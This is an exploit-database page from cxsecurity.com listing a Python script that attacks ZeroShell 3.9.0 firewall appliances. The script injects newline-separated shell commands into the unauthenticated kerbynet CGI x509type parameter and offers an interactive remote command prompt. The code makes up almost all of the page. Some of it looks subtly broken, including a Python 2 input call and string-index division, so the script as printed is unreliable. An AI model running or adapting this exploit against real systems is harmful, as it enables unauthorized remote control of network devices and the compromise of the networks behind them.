ZeroShell 3.9.0 | Remote Command Execution

2021.05.30
ir Ali Seddigh (IR) ir
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|=========================================================================== | # Exploit Title : ZeroShell 3.9.0 | Remote Command Execution | | # Author : Ali Seddigh | | # Category : Web Application | | # Vendor Homepage: https://zeroshell.org/ | | # Software Link: https://zeroshell.org/download/ | | # Tested on : [ Windows ~> 10 , Kali Linux ] | | # Version : 3.9.0 | | # Date : 2021-05-29 |=========================================================================== #!/usr/bin/python3 import requests import optparse import time parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)') options, args = parser.parse_args() if not options.url: print('[+] Specify an url target') print('[+] Example usage: exploit.py -u http://target-uri/') print('[+] Example help usage: exploit.py -h') exit() uri_zeroshell = options.url session = requests.Session() def command(): try: check = session.get(uri_zeroshell + "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0Aid%0A'") if check.status_code == 200: flag = True print('[+] ZeroShell 3.9.0 Remote Command Execution') time.sleep(1) print('[+] Success connect to target') time.sleep(1) print('[+] Trying to execute command in ZeroShell OS...\n') time.sleep(1) check.raise_for_status() while flag: cmd = raw_input("$ ") payload = "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A" + cmd + "%0A'" uri_vuln = uri_zeroshell + payload burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} res = session.get(uri_vuln, headers=burp0_headers, verify=False) print(res.text[:res.text.rindex("<html>") / 2]) except requests.exceptions.ConnectionError as err: print('[x] Failed to Connect in: '+uri_zeroshell+' ') print('[x] This host seems to be Down') exit() except requests.exceptions.HTTPError as conn: print('[x] Failed to execute command in: '+uri_zeroshell+' ') print('[x] This host does not appear to be a ZeroShell') exit() command() |=========================================================================== | # Discovered By : Ali Triplex |===========================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top